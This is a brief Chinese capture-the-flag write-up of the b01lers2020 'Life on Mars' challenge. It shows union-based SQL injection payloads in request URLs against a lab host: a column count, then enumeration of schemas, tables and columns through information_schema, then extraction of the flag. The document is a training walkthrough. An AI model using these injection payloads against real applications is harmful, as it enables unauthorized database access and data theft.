[b01lers2020]Life on Mars1

打开靶场

 直接bp抓包

多次点击左侧超链接

发现/query?search=这个参数一直在发生改变

可以发现它返回了json格式的数据，猜测是sql注入

 放进hackbar进行操作

orderby进行判断

http://6f5976a0-0364-4c05-a7f5-6f0c863e7e41.node4.buuoj.cn:81/query?search=amazonis_planitia order by 1,2

 后面就是sql注入一梭子

http://6f5976a0-0364-4c05-a7f5-6f0c863e7e41.node4.buuoj.cn:81/query?search=amazonis_planitia union select 1,2

 看到回显点，进行查询

 读库名

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons union select 1,(SELECT group_concat(schema_name) FROM information_schema.schemata)

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(SELECT group_concat(table_name) FROM information_schema.tables  WHERE table_schema = 'alien_code')

 读列名

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'code')

 读字段

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(select group_concat(code) from alien_code.code limit 1)